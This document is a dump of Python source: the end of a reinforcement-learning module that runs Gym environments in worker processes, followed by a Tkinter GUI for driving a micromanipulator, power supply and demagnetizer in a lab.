blocking: Whether to wait for the result.
Returns:
Transition tuple when blocking, otherwise callable that returns the
transition tuple.
"""
promise = self.call("step", action)
if blocking:
return promise()
else:
return promise
def reset(self, blocking=True):
"""Reset the environment.
Args:
blocking: Whether to wait for the result.
Returns:
New observation when blocking, otherwise callable that returns the new
observation.
"""
promise = self.call("reset")
if blocking:
return promise()
else:
return promise
def _receive(self):
"""Wait for a message from the worker process and return its payload.
Raises:
Exception: An exception was raised inside the worker process.
KeyError: The received message is of an unknown type.
Returns:
Payload object of the message.
"""
message, payload = self._conn.recv()
# Re-raise exceptions in the main process.
if message == self._EXCEPTION:
stacktrace = payload
raise Exception(stacktrace)
if message == self._RESULT:
return payload
raise KeyError("Received message of unexpected type {}".format(message))
def _worker(self, constructor, conn):
"""The process waits for actions and sends back environment results.
Args:
constructor: Constructor for the OpenAI Gym environment.
conn: Connection for communication to the main process.
"""
try:
env = constructor()
while True:
try:
# Only block for short times to have keyboard exceptions be raised.
if not conn.poll(0.1):
continue
message, payload = conn.recv()
except (EOFError, KeyboardInterrupt):
break
if message == self._ACCESS:
name = payload
result = getattr(env, name)
conn.send((self._RESULT, result))
continue
if message == self._CALL:
name, args, kwargs = payload
result = getattr(env, name)(*args, **kwargs)
conn.send((self._RESULT, result))
continue
if message == self._CLOSE:
assert payload is None
env.close()
break
raise KeyError("Received message of unknown type {}".format(message))
except Exception: # pylint: disable=broad-except
stacktrace = "".join(traceback.format_exception(*sys.exc_info())) # pylint: disable=no-value-for-parameter
tf.logging.error("Error in environment process: {}".format(stacktrace))
conn.send((self._EXCEPTION, stacktrace))
conn.close()
def batch_env_factory(environment_lambda, hparams, num_agents, xvfb=False):
"""Factory of batch envs."""
wrappers = hparams.in_graph_wrappers if hasattr(
hparams, "in_graph_wrappers") else []
if hparams.simulated_environment:
cur_batch_env = define_simulated_batch_env(environment_lambda, num_agents)
else:
cur_batch_env = define_batch_env(environment_lambda, num_agents, xvfb=xvfb)
for w in wrappers:
cur_batch_env = w[0](cur_batch_env, **w[1])
return cur_batch_env
def define_batch_env(constructor, num_agents, xvfb=False):
"""Create environments and apply all desired wrappers."""
with tf.variable_scope("environments"):
envs = [
ExternalProcessEnv(constructor, xvfb)
for _ in range(num_agents)]
env = batch_env.BatchEnv(envs, blocking=False)
env = py_func_batch_env.PyFuncBatchEnv(env)
return env
def define_simulated_batch_env(environment_lambda, num_agents):
cur_batch_env = simulated_batch_env.SimulatedBatchEnv(
environment_lambda, num_agents)
return cur_batch_env
|
gui.py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# GUI module generated by PAGE version 4.17
# In conjunction with Tcl version 8.6
# Nov 05, 2018 02:38:38 AM EST platform: Linux
import os
import sys
import time
import re
current_directory = os.getcwd()
parent_directory = os.path.dirname(current_directory)
sys.path.insert(0, parent_directory)
from api.demagnetizer import Demagnetizer # noqa: 402
try:
from Tkinter import (
Text,
Tk,
Toplevel,
Menu,
Frame,
Entry,
Label,
Button,
Listbox,
Spinbox,
Radiobutton,
Pack,
Grid,
Place)
except ImportError:
from tkinter import (
Text,
Tk,
Toplevel,
Menu,
Frame,
Entry,
Label,
Button,
Listbox,
Spinbox,
Radiobutton,
Pack,
Grid,
Place)
try:
import ttk
py3 = False
except ImportError:
import tkinter.ttk as ttk
py3 = True
import gui_support # noqa: 402
import serial.tools.list_ports # noqa: 402
from api.wave_visualizer import visualize_wave # noqa: 402
from api.manipulator import Manipulator, Mode, Resolution # noqa: 402
from api.power_supply import PowerSupply, MIN_STEP_PERIOD # noqa: 402
from api.relay import Relay # noqa: 402
from threading import Thread # noqa: 402
def vp_start_gui():
'''Starting point when module is the main routine.'''
global val, w, root
root = Tk()
gui_support.set_Tk_var()
top = GUI(root)
gui_support.init(root, top)
root.mainloop()
w = None
def create_GUI(root, *args, **kwargs):
'''Starting point when module is imported by another program.'''
global w, w_win, rt
rt = root
w = Toplevel(root)
gui_support.set_Tk_var()
top = GUI(w)
gui_support.init(w, top, *args, **kwargs)
return (w, top)
def destroy_GUI():
global w
w.destroy()
w = None
class GUI:
def __init__(self, top=None):
'''This class configures and populates the toplevel window.
top is the toplevel containing window.'''
_bgcolor = '#d9d9d9' # X11 color: 'gray85'
_fgcolor = '#000000' # X11 color: 'black'
_compcolor = '#d9d9d9' # X11 color: 'gray85'
_ana1color = '#d9d9d9' # noqa X11 color: 'gray85'
_ana2color = '#d9d9d9' # X11 color: 'gray85'
font10 = ("-family Verdana -size 14 -weight normal -slant roman "
"-underline 0 -overstrike 0")
font11 = ("-family Verdana -size 14 -weight bold -slant roman "
"-underline 0 -overstrike 0")
font9 = ("-family Verdana -size 12 -weight normal -slant roman "
"-underline 0 -overstrike 0")
self.style = ttk.Style()
if sys.platform == "win32":
self.style.theme_use('winnative')
self.style.configure('.', background=_bgcolor)
self.style.configure('.', foreground=_fgcolor)
self.style.configure('.', font="TkDefaultFont")
self.style.map(
'.', background=[('selected', _compcolor), ('active', _ana2color)])
top.geometry("758x629+110+66")
top.title("GUI")
top.configure(highlightcolor="black")
self.menubar = Menu(top, font="TkMenuFont", bg=_bgcolor, fg=_fgcolor)
top.configure(menu=self.menubar)
# TODO
'''
-MANUAL COM PORT SELECTION, VARIABLE COM PORTS, AUTO DETECT COM PORTS?
-STOP/INTERRUPT BUTTONS
-MAKE PATHING FUNCTION
-Be able to save and load 2 position
'''
# INSTANCE INITIALIZATION FOR MANIPULATOR, POWER SUPPLY, AND DEMAG
ports = list(serial.tools.list_ports.comports())
relay_1 = Relay(5)
relay_2 = Relay(6)
mm = None
supply = None
demagnetizer = None
for p in ports:
if "/dev/ttyUSB0" in p:
supply = PowerSupply("/dev/ttyUSB0", relay_1, relay_2)
demagnetizer = Demagnetizer(supply, relay_1, relay_2)
if "/dev/ttyUSB1" in p:
mm = Manipulator("/dev/ttyUSB1")
# BEGINNING OF FUNCTIONALITY
def demagnetization():
"""
Begins the demagnetization process. Must call
calibrate_demag() the first time the GUI is opened.
A 3 second delay is added to this function to allow the
user to get into position.
"""
try:
# global defined in calibrate_demag()
zero_field # noqa
except NameError:
self.console_output.insert(1.0, "Calibration required\n")
else:
self.console_output.insert(1.0,
"Demagnetization in progress\n")
time.sleep(3)
demagnetizer.demag_current(zero_field) # noqa
r_field = demagnetizer.get_field()
demag_complete = "Demagnetization complete. Residual field is "
self.console_output.insert(
1.0, demag_complete + str(r_field) + "\n")
def calibrate_demag():
"""
Calibration of the Hall sensor. This function should be
called before every demagnetization for optimal results.
A 3 second delay is added to this function to allow the
user to get into position.
"""
self.console_output.insert(1.0, "Calibration in progress\n")
time.sleep(3)
global zero_field
zero_field = demagnetizer.calibrate()
self.console_output.insert(1.0,
"Calibration complete. Zero field is " +
str(zero_field) + "\n")
def status_refresh():
"""
Is called by many other functions but can be manually called
as well via the Refresh button.
Polls the manipulator and the power supply for updates on
various parameters.
"""
if mm is not None:
mm.set_mode(Mode.ABSOLUTE)
x, y, z = mm.get_current_position()
gui_support.status_abspos_v.set(
str(x) + " x, " + str(y) + " y, " + str(z) + " z")
mm_status_dict = mm.get_status()
vel = mm_status_dict['XSPEED']
gui_support.velocity.set(str(vel))
gui_support.status_vel_v.set(str(vel))
res = mm_status_dict['XSPEED_RES']
gui_support.status_res_v.set(str(res))
mm.refresh_display()
c = round(supply.get_current(), 4)
gui_support.status_current_v.set(str(c))
gui_support.status_magfield_v.set(str(demagnetizer.get_field()))
self.console_output.insert(1.0, "Status page refreshed\n")
def is_ok(string):
"""
Checks to make sure the input string is valid. The string
should contain only numbers and not contain any special
characters besides only 1 of '-' and '.' each.
No alphabetical characters.
:param string: String to check for validity
"""
match = re.search('[^0-9.-]', str(string))
if match:
return True
else:
if not string:
return True
elif string.count('-') > 1 or string.count('.') > 1:
return True
elif string.find('-') != -1 and not (string.startswith('-')):
return True
elif string.startswith('.'):
return True
elif string.startswith('-') and len(string) == 1:
return True
else:
return False
def gtp():
"""
Calls the manipulator api function go_to_position with
parameters set to the entry fields.
"""
x = gui_support.gtp_x.get()
y = gui_support.gtp_y.get()
z = gui_support.gtp_z.get()
if (is_ok(x) or is_ok(y) or is_ok(z)):
format_warning = ("Only numbers, '-', and '.' are allowed. ",
"Please check format\n")
self.console_output.insert(1.0, format_warning)
else:
self.console_output.insert(
1.0, "Moving to " + x + "x " + y + "y " + z + "z\n")
mm.set_mode(Mode.ABSOLUTE)
mm.go_to_position(float(x), float(y), float(z))
self.console_output.insert(1.0, "Moving complete\n")
status_refresh()
def save_pos():
"""
Saves the position currently entered into the 3 entry
fields. This does not save the current position.
"""
mm.set_mode(Mode.ABSOLUTE)
x, y, z = mm.get_current_position()
self.Listbox_pos.insert(
0,
str(x) + "x, " + str(y) + "y, " + str(z) + "z")
self.console_output.insert(1.0, "Position saved to list\n")
def go_to():
"""
Moves manipulator to selected position in the listbox.
"""
index = self.Listbox_pos.curselection()
selected = self.Listbox_pos.get(index)
if not selected:
self.console_output.insert(1.0,
"Please select a destination\n")
else:
x, y, z = selected.split(", ")
x = x[:-1]
y = y[:-1]
z = z[:-1]
self.console_output.insert(
1.0, "Moving to " + x + "x " + y + "y " + z + "z\n")
mm.set_mode(Mode.ABSOLUTE)
mm.go_to_position(float(x), float(y), float(z))
self.console_output.insert(1.0, "Moving complete\n")
status_refresh()
def delete():
"""
Delete selected element from the list.
"""
index = self.Listbox_pos.curselection()
if index is None:
self.console_output.insert(1.0,
"Please select a destination\n")
else:
self.Listbox_pos.delete(index)
self.console_output.insert(1.0, "Deleted list entry\n")
def step_x():
"""
Calls the manipulator api function get_position to get
parameters for the manipulator api function go_to_position.
"""
xmove = gui_support.step_x.get()
if (is_ok(xmove)):
coord_warning = ("Only numbers, '-', and '.' are allowed. "
"Please check format\n")
self.console_output.insert(1.0, coord_warning)
else:
self.console_output.insert(1.0,
"Moving by " + str(xmove) + "x\n")
mm.set_mode(Mode.ABSOLUTE)
x, y, z = mm.get_current_position()
mm.go_to_position(float(xmove) + x, y, z)
self.console_output.insert(1.0, "Moving complete\n")
status_refresh()
def step_y():
"""
Calls the manipulator api function get_position to get
parameters for the manipulator api function go_to_position.
"""
ymove = gui_support.step_y.get()
if is_ok(ymove):
coord_warning = ("Only numbers, '-', and '.' are allowed. "
"Please check format\n")
self.console_output.insert(1.0, coord_warning)
else:
self.console_output.insert(1.0,
"Moving by " + str(ymove) + "y\n")
mm.set_mode(Mode.ABSOLUTE)
x, y, z = mm.get_current_position()
mm.go_to_position(x, float(ymove) + y, z)
self.console_output.insert(1.0, "Move complete\n")
status_refresh()
def step_z():
"""
Calls the manipulator api function get_position to get
parameters for the manipulator api function go_to_position.
:return:
"""
zmove = gui_support.step_z.get()
if (is_ok(zmove)):
coord_warning = ("Only numbers, '-', and '.' are allowed. "
"Please check format\n")
self.console_output.insert(1.0, coord_warning)
else:
self.console_output.insert(1.0,
"Moving by " + str(zmove) + "z\n")
mm.set_mode(Mode.ABSOLUTE)
x, y, z = mm.get_current_position()
mm.go_to_position(x, y, float(zmove) + z)
self.console_output.insert(1.0, "Move complete\n")
status_refresh()
def change_velocity():
"""
Calls the manipulator api function change_velocity which
changes velocity and resolution of user input.
"""
vel = gui_support.velocity.get()
if is_ok(vel):
vel_warning = ("Only numbers, '-', and '.' are allowed. "
"Please check format\n")
self.console_output.insert(1.0, vel_warning)
elif float(vel) <= 0:
vel_warning = "Velocity must be positive and less than 1000\n"
self.console_output.insert(1.0, vel_warning)
else:
if gui_support.radio_resolution.get() == "low":
mm.set_velocity(float(vel), Resolution.LOW)
else:
mm.set_velocity(float(vel), Resolution.HIGH)
self.console_output.insert(
1.0, "Changed velocity to " + str(vel) + "um/s\n")
status_refresh()
def change_resolution():
"""
Calls the manipulator api function change_velocity which
changes velocity and resolution of user input
but the velocity is kept the same as what is programmed to
the device.
"""
mm_status_dict = mm.get_status()
vel = mm_status_dict['XSPEED']
if gui_support.radio_resolution.get() == "low":
mm.set_velocity(float(vel), Resolution.LOW)
else:
mm.set_velocity(float(vel), Resolution.HIGH)
status_refresh()
def path():
"""
Pathing function takes a parametric each equation for x y
and z direction. Last two field are for the upper and
lower bound.
"""
def master_stop():
"""
Calls both the manipulator and supply interrupts and set
duration to 0 which kills the timer thread.
This function should also stop the demagnetization process.
Implementation would require separate thread for demagnetization.
"""
supply_interupt()
mm_interupt()
gui_support.status_duration_v.set("0")
self.console_output.insert(1.0, "All processes stopped\n")
def mm_interupt():
"""
Calls the manipulator api function interrupt()
"""
mm.interrupt()
self.console_output.insert(1.0, "Micromanipulator interrupted\n")
def supply_interupt():
"""
Calls the power_supply api functions disable_output and
stop_wave. Kills timer thread.
"""
supply.disable_output()
supply.stop_wave()
gui_support.status_duration_v.set("0")
self.console_output.insert(1.0, "Power supply interrupted\n")
def stop():
"""
Calls the power_supply api functions disable_output and
stop_wave. Kills timer thread.
"""
supply.disable_output()
gui_support.status_duration_v.set("0")
supply.stop_wave()
self.console_output.insert(1.0, "Power supply output disabled\n")
def constant_run():
"""
Program the power supply to a constant current and starts
a timer thread for the duration.
"""
duration = gui_support.constant_duration.get()
current = gui_support.constant_amps.get()
if (is_ok(duration) or is_ok(current)):
dur_cur_warning = ("Only numbers, '-', and '.' are allowed. "
"Please check format\n")
self.console_output.insert(1.0, dur_cur_warning)
elif float(duration) <= 0:
dur_warning = "Duration must be greater than 0\n"
self.console_output.insert(1.0, dur_warning)
elif float(current) > 3:
cur_warning = "Current must be less than 3\n"
self.console_output.insert(1.0, cur_warning)
else:
supply.set_current(float(current))
supply.enable_output()
gui_support.status_wave_v.set("Constant")
gui_support.status_duration_v.set(str(duration))
duration_thread = Thread(target=duration_timer)
duration_thread.start()
self.console_output.insert(
1.0, "Running constant wave for " + str(duration) + "s\n")
def square_run():
"""
Program the power supply to a square wave and starts a
timer thread for the duration.
"""
curr = gui_support.square_amp.get()
freq = gui_support.square_freq.get()
duty = gui_support.square_duty.get()
duration = gui_support.square_duration.get()
if (is_ok(duration) or is_ok(curr) or is_ok(freq) or is_ok(duty)):
square_warning = ("Only numbers, '-', and '.' are allowed. "
"Please check format\n")
self.console_output.insert(1.0, square_warning)
elif float(duration) <= 0:
duration_warning = "Duration must be greater than 0\n"
self.console_output.insert(1.0, duration_warning)
elif float(curr) > 3:
current_warning = "Current must be less than or equal to 3\n"
self.console_output.insert(1.0, current_warning)
else:
supply.start_square_wave(
float(curr), 1 / float(freq),
float(duty) / 100)
gui_support.status_wave_v.set("Square")
gui_support.status_duration_v.set(str(duration))
duration_thread = Thread(target=duration_timer)
duration_thread.start()
self.console_output.insert(
1.0, "Running square wave for " + str(duration) + "s\n")
def sinusoidal_run():
"""
Program the power supply to a sin wave and starts a timer
thread for the duration.
"""
amp = gui_support.sin_amplitude.get()
offset = gui_support.sin_offset.get()
freq = gui_support.sin_freq.get()
duration = gui_support.sin_duration.get()
if (is_ok(duration) or is_ok(amp) or is_ok(freq) or is_ok(offset)):
sine_warning = ("Only numbers, '-', and '.' are allowed. "
"Please check format\n")
self.console_output.insert(1.0, sine_warning)
elif float(duration) <= 0:
duration_warning = "Duration must be greater than 0\n"
self.console_output.insert(1.0, duration_warning)
elif float(amp) + float(offset) > 3:
amp_offset_warning = ("Amplitude + offset must be less than "
"or equal to 3\n")
self.console_output.insert(1.0, amp_offset_warning)
else:
supply.start_sine_wave(
float(amp), 1 / float(freq), None, float(offset))
gui_support.status_wave_v.set("Sinusoidal")
gui_support.status_duration_v.set(str(duration))
duration_thread = Thread(target=duration_timer)
duration_thread.start()
self.console_output.insert(
1.0,
"Running sinusoidal wave for " + str(duration) + "s\n")
def ramping_run():
"""
Program the power supply to a ramping wave and starts a
timer thread for the duration.
"""
amp = gui_support.ramping_amp.get()
rise = gui_support.ramping_rise.get()
steady = gui_support.ramping_steady.get()
rest = gui_support.ramping_rest.get()
duration = gui_support.ramping_duration.get()
if (is_ok(duration) or is_ok(amp) or is_ok(rise) or is_ok(steady)
or is_ok(rest)): # noqa
console_warning = ("Only numbers, '-', and '.' are allowed."
" Please check format\n")
self.console_output.insert(1.0, console_warning)
elif float(duration) <= 0:
duration_warning = "Duration must be greater than 0\n"
self.console_output.insert(1.0, duration_warning)
elif float(amp) > 3:
amp_warning = "Current must be less than or equal to 3\n"
self.console_output.insert(1.0, amp_warning)
else:
supply.start_ramp_wave(
float(amp), float(rise), float(steady), float(rest))
gui_support.status_wave_v.set("Ramping")
gui_support.status_duration_v.set(str(duration))
duration_thread = Thread(target=duration_timer)
duration_thread.start()
self.console_output.insert(
1.0, "Running ramping wave for " + str(duration) + "s\n")
def duration_timer():
"""
Duration thread used to time power supply functionality.
"""
duration = float(gui_support.status_duration_v.get())
while duration > 0:
if (float(gui_support.status_duration_v.get()) <= 0):
supply.disable_output()
supply.stop_wave()
break
self.console_output.delete(1.0)
self.console_output.insert(
1.0, "Remaining duration: " + str(duration) + "\n")
time.sleep(1)
duration = duration - 1
supply.stop_wave()
supply.disable_output()
def clear_console():
"""
Clears Console Output.
"""
self.console_output.delete(1.0, END) # noqa
def write_log():
"""
Writes the contents of the Console Output to a file.
"""
current_directory = os.getcwd() + "/log.txt"
msg = self.console_output.get(1.0, END) # noqa
f = open(current_directory, 'a+')
f.write("==========================NEW LOG"
"==========================\n" + msg)
f.close()
def plot_square():
amp = gui_support.square_amp.get()
freq = gui_support.square_freq.get()
period = 1 / float(freq)
duty = gui_support.square_duty.get()
duty_cycle = float(duty) / 100
square_function = '%f * (step(t) - step(t-%f))' % (
float(amp), period * duty_cycle)
visualize_wave(
square_function, 't', (0, period), wave_title="Square Wave")
def plot_ramping():
amp = gui_support.ramping_amp.get()
rise_time = gui_support.ramping_rise.get()
steady_time = gui_support.ramping_steady.get()
rest_time = gui_support.ramping_rest.get()
ramp_function = ('(%(amp)f / %(rise_time)f) * t * (step(t) - '
'step(t - %(rise_time)f)) + %(amp)f * '
'(step(t-%(rise_time)f) - step(t - %('
'rise_time)f - %(steady_time)f))') % {
'amp': float(amp),
'rise_time': float(rise_time),
'steady_time': float(steady_time)
}
visualize_wave(
ramp_function, 't',
(0, float(rise_time) + float(steady_time) + float(rest_time)),
MIN_STEP_PERIOD, "Ramping Wave")
def plot_sin():
amp = float(gui_support.sin_amplitude.get())
dc_offset = float(gui_support.sin_offset.get())
period = 1 / float(gui_support.sin_freq.get())
time_offset = 0
sin_function = '%f * sin(2 * pi * (t - %f) / %f) + %f' % (
amp, time_offset, period, dc_offset)
visualize_wave(sin_function, 't', (0, period), MIN_STEP_PERIOD,
"Sine Wave")
# GUI WIDGETS/ELEMENTS FOLLOW
self.MM_Frame = Frame(top)
self.MM_Frame.place(
relx=0.0, rely=0.0, relheight=0.479, relwidth=0.534)
self.MM_Frame.configure(relief=RAISED) # noqa
self.MM_Frame.configure(borderwidth="2")
self.MM_Frame.configure(relief=RAISED) # noqa
self.MM_Frame.configure(width=405)
self.Entry_gtp_x = Entry(self.MM_Frame)
self.Entry_gtp_x.place(
relx=0.049, rely=0.136, height=20, relwidth=0.129)
self.Entry_gtp_x.configure(background="white")
self.Entry_gtp_x.configure(font="TkFixedFont")
self.Entry_gtp_x.configure(selectbackground="#c4c4c4")
self.Entry_gtp_x.configure(textvariable=gui_support.gtp_x)
self.Label_Manipulator = Label(self.MM_Frame, anchor='w')
self.Label_Manipulator.place(
relx=0.049, rely=0.034, height=28, width=150)
self.Label_Manipulator.configure(activebackground="#f9f9f9")
self.Label_Manipulator.configure(font=font9)
self.Label_Manipulator.configure(text='''Micromanipulator''')
self.Entry_gtp_y = Entry(self.MM_Frame)
self.Entry_gtp_y.place(
relx=0.181, rely=0.136, height=20, relwidth=0.129)
self.Entry_gtp_y.configure(background="white")
self.Entry_gtp_y.configure(font="TkFixedFont")
self.Entry_gtp_y.configure(selectbackground="#c4c4c4")
self.Entry_gtp_y.configure(textvariable=gui_support.gtp_y)
self.Entry_gtp_z = Entry(self.MM_Frame)
self.Entry_gtp_z.place(
relx=0.311, rely=0.136, height=20, relwidth=0.129)
self.Entry_gtp_z.configure(background="white")
self.Entry_gtp_z.configure(font="TkFixedFont")
self.Entry_gtp_z.configure(selectbackground="#c4c4c4")
self.Entry_gtp_z.configure(textvariable=gui_support.gtp_z)
self.Button_gtp = Button(self.MM_Frame, command=lambda: gtp())
self.Button_gtp.place(relx=0.049, rely=0.211, height=26, width=149)
self.Button_gtp.configure(activebackground="#d9d9d9")
self.Button_gtp.configure(text='''Go To Position (um)''')
self.Listbox_pos = Listbox(self.MM_Frame)
self.Listbox_pos.place(
relx=0.494, rely=0.068, relheight=0.217, relwidth=0.479)
self.Listbox_pos.configure(background="white")
self.Listbox_pos.configure(font="TkFixedFont")
self.Listbox_pos.configure(selectmode='single')
self.Listbox_pos.configure(width=194)
self.Button_goto = Button(self.MM_Frame, command=lambda: go_to())
self.Button_goto.place(relx=0.519, rely=0.305, height=26, width=62)
self.Button_goto.configure(activebackground="#d9d9d9")
self.Button_goto.configure(text='''Go To''')
self.Button_delete = Button(self.MM_Frame, command=lambda: delete())
self.Button_delete.place(relx=0.716, rely=0.305, height=26, width=62)
self.Button_delete.configure(activebackground="#d9d9d9")
self.Button_delete.configure(text='''Delete''')
self.Button_step_x = Button(self.MM_Frame, command=lambda: step_x())
self.Button_step_x.place(relx=0.198, rely=0.508, height=26, width=32)
self.Button_step_x.configure(activebackground="#d9d9d9")
self.Button_step_x.configure(text='''x''')
self.Label_step = Label(self.MM_Frame, anchor='w')
self.Label_step.place(relx=0.049, rely=0.441, height=18, width=66)
self.Label_step.configure(activebackground="#f9f9f9")
self.Label_step.configure(text='''Step (um)''')
self.Button_step_y = Button(self.MM_Frame, command=lambda: step_y())
self.Button_step_y.place(relx=0.198, rely=0.61, height=26, width=32)
self.Button_step_y.configure(activebackground="#d9d9d9")
self.Button_step_y.configure(text='''y''')
self.Button_step_z = Button(self.MM_Frame, command=lambda: step_z())
self.Button_step_z.place(relx=0.198, rely=0.712, height=26, width=32)
self.Button_step_z.configure(activebackground="#d9d9d9")
self.Button_step_z.configure(text='''z''')
self.Button_save_pos = Button(
self.MM_Frame, command=lambda: save_pos())
self.Button_save_pos.place(
relx=0.049, rely=0.305, height=26, width=145)
self.Button_save_pos.configure(activebackground="#d9d9d9")
self.Button_save_pos.configure(text='''Save Present Position''')
self.Button_velocity = Button(
self.MM_Frame, command=lambda: change_velocity())
self.Button_velocity.place(
relx=0.444, rely=0.475, height=26, width=118)
self.Button_velocity.configure(activebackground="#d9d9d9")
self.Button_velocity.configure(text='''Velocity (um/s)''')
self.Entry_velocity = Entry(self.MM_Frame)
self.Entry_velocity.place(
relx=0.765, rely=0.475, height=20, relwidth=0.138)
self.Entry_velocity.configure(background="white")
self.Entry_velocity.configure(font="TkFixedFont")
self.Entry_velocity.configure(selectbackground="#c4c4c4")
self.Entry_velocity.configure(textvariable=gui_support.velocity)
self.Spinbox_step_x = Spinbox(self.MM_Frame, from_=-50.0, to=50.0)
self.Spinbox_step_x.place(
relx=0.049, rely=0.508, relheight=0.068, relwidth=0.134)
self.Spinbox_step_x.configure(activebackground="#f9f9f9")
self.Spinbox_step_x.configure(background="white")
self.Spinbox_step_x.configure(highlightbackground="black")
self.Spinbox_step_x.configure(selectbackground="#c4c4c4")
self.Spinbox_step_x.configure(textvariable=gui_support.step_x)
self.Spinbox_step_z = Spinbox(self.MM_Frame, from_=-50.0, to=50.0)
self.Spinbox_step_z.place(
relx=0.049, rely=0.712, relheight=0.068, relwidth=0.134)
self.Spinbox_step_z.configure(activebackground="#f9f9f9")
self.Spinbox_step_z.configure(background="white")
self.Spinbox_step_z.configure(highlightbackground="black")
self.Spinbox_step_z.configure(selectbackground="#c4c4c4")
self.Spinbox_step_z.configure(textvariable=gui_support.step_z)
self.Spinbox_step_y = Spinbox(self.MM_Frame, from_=-50.0, to=50.0)
self.Spinbox_step_y.place(
relx=0.049, rely=0.61, relheight=0.068, relwidth=0.134)
self.Spinbox_step_y.configure(activebackground="#f9f9f9")
self.Spinbox_step_y.configure(background="white")
self.Spinbox_step_y.configure(highlightbackground="black")
self.Spinbox_step_y.configure(selectbackground="#c4c4c4")
self.Spinbox_step_y.configure(textvariable=gui_support.step_y)
self.Radiobutton_highres = Radiobutton(
self.MM_Frame, command=lambda: change_resolution())
self.Radiobutton_highres.place(
relx=0.42, rely=0.576, relheight=0.068, relwidth=0.469)
self.Radiobutton_highres.configure(activebackground="#d9d9d9")
self.Radiobutton_highres.configure(justify=LEFT) # noqa
self.Radiobutton_highres.configure(
text='''High Resolution (0.4um/s)''')
self.Radiobutton_highres.configure(value="low")
self.Radiobutton_highres.configure(
variable=gui_support.radio_resolution)
self.Radiobutton_lowres = Radiobutton(
self.MM_Frame, command=lambda: change_resolution())
self.Radiobutton_lowres.place(
relx=0.43, rely=0.644, relheight=0.068, relwidth=0.415)
self.Radiobutton_lowres.configure(activebackground="#d9d9d9")
self.Radiobutton_lowres.configure(justify=LEFT) # noqa
self.Radiobutton_lowres.configure(text='''Low Resolution (2um/s)''')
self.Radiobutton_lowres.configure(value="high")
self.Radiobutton_lowres.configure(
variable=gui_support.radio_resolution)
self.Button_mm_interrupt = Button(
self.MM_Frame, command=lambda: mm_interupt())
self.Button_mm_interrupt.place(
relx=0.642, rely=0.705, height=36, width=131)
self.Button_mm_interrupt.configure(activebackground="#d80000")
self.Button_mm_interrupt.configure(background="#d80000")
self.Button_mm_interrupt.configure(font=font10)
self.Button_mm_interrupt.configure(state=ACTIVE) # noqa
self.Button_mm_interrupt.configure(text='''Interrupt''')
self.Button_mm_interrupt.configure(width=131)
# self.Radiobutton_absolute = Radiobutton(self.MM_Frame)
# self.Radiobutton_absolute.place(relx=0.444,
# rely=0.136,
# relheight=0.068,
# relwidth=0.205)
# self.Radiobutton_absolute.configure(activebackground="#d9d9d9")
# self.Radiobutton_absolute.configure(justify='left')
# self.Radiobutton_absolute.configure(text='''Absolute''')
# self.Radiobutton_absolute.configure(value="absolute")
# self.Radiobutton_absolute.configure(variable=gui_support.radio_pos_mode)
# self.Radiobutton_relative = Radiobutton(self.MM_Frame)
# self.Radiobutton_relative.place(relx=0.444,
# rely=0.203,
# relheight=0.068,
# relwidth=0.19)
# self.Radiobutton_relative.configure(activebackground="#d9d9d9")
# self.Radiobutton_relative.configure(justify='left')
# self.Radiobutton_relative.configure(text='''Relative''')
# self.Radiobutton_relative.configure(value="relative")
# self.Radiobutton_relative.configure(variable=gui_support.radio_pos_mode)
self.Label_pathing = Label(self.MM_Frame)
self.Label_pathing.place(relx=0.049, rely=0.8, height=18, width=110)
self.Label_pathing.configure(activebackground="#f9f9f9")
self.Label_pathing.configure(text='''Pathing Function''')
self.Entry_path_x = Entry(self.MM_Frame)
self.Entry_path_x.place(
relx=0.049, rely=0.868, height=20, relwidth=0.114)
self.Entry_path_x.configure(background="white")
self.Entry_path_x.configure(font="TkFixedFont")
self.Entry_path_x.configure(selectbackground="#c4c4c4")
self.Entry_path_x.configure(textvariable=gui_support.path_x)
self.Entry_path_y = Entry(self.MM_Frame)
self.Entry_path_y.place(
relx=0.172, rely=0.868, height=20, relwidth=0.114)
self.Entry_path_y.configure(background="white")
self.Entry_path_y.configure(font="TkFixedFont")
self.Entry_path_y.configure(selectbackground="#c4c4c4")
self.Entry_path_y.configure(textvariable=gui_support.path_y)
self.Entry_path_z = Entry(self.MM_Frame)
self.Entry_path_z.place(
relx=0.296, rely=0.868, height=20, relwidth=0.114)
self.Entry_path_z.configure(background="white")
self.Entry_path_z.configure(font="TkFixedFont")
self.Entry_path_z.configure(selectbackground="#c4c4c4")
self.Entry_path_z.configure(textvariable=gui_support.path_z)
self.Entry_path_min = Entry(self.MM_Frame)
self.Entry_path_min.place(
relx=0.419, rely=0.868, height=20, relwidth=0.114)
self.Entry_path_min.configure(background="white")
self.Entry_path_min.configure(font="TkFixedFont")
self.Entry_path_min.configure(selectbackground="#c4c4c4")
self.Entry_path_min.configure(textvariable=gui_support.path_min)
self.Entry_path_max = Entry(self.MM_Frame)
self.Entry_path_max.place(
relx=0.543, rely=0.868, height=20, relwidth=0.114)
self.Entry_path_max.configure(background="white")
self.Entry_path_max.configure(font="TkFixedFont")
self.Entry_path_max.configure(selectbackground="#c4c4c4")
self.Entry_path_max.configure(textvariable=gui_support.path_max)
self.Label_path_x = Label(self.MM_Frame)
self.Label_path_x.place(relx=0.049, rely=0.932, height=18, width=22)
self.Label_path_x.configure(anchor='w')
self.Label_path_x.configure(text='''x''')
self.Label_path_x.configure(width=22)
self.Label_path_y = Label(self.MM_Frame)
self.Label_path_y.place(relx=0.197, rely=0.932, height=18, width=22)
self.Label_path_y.configure(activebackground="#f9f9f9")
self.Label_path_y.configure(anchor='w')
self.Label_path_y.configure(text='''y''')
self.Label_path_z = Label(self.MM_Frame)
self.Label_path_z.place(relx=0.320, rely=0.932, height=18, width=22)
self.Label_path_z.configure(activebackground="#f9f9f9")
self.Label_path_z.configure(anchor='w')
self.Label_path_z.configure(text='''z''')
self.Label_path_bound = Label(self.MM_Frame)
self.Label_path_bound.place(
relx=0.419, rely=0.932, height=18, width=132)
self.Label_path_bound.configure(activebackground="#f9f9f9")
self.Label_path_bound.configure(anchor='w')
self.Label_path_bound.configure(text='''min and max bound''')
self.Label_path_bound.configure(width=132)
self.Button_path = Button(self.MM_Frame)
self.Button_path.place(relx=0.666, rely=0.853, height=26, width=43)
self.Button_path.configure(activebackground="#d9d9d9")
self.Button_path.configure(text='''Go''')
self.Current_Frame = Frame(top)
self.Current_Frame.place(
relx=0.0, rely=0.487, relheight=0.5, relwidth=0.534)
self.Current_Frame.configure(relief=RAISED) # noqa
self.Current_Frame.configure(borderwidth="2")
self.Current_Frame.configure(relief=RAISED) # noqa
self.Current_Frame.configure(width=405)
self.Label_ps = Label(self.Current_Frame, anchor='w')
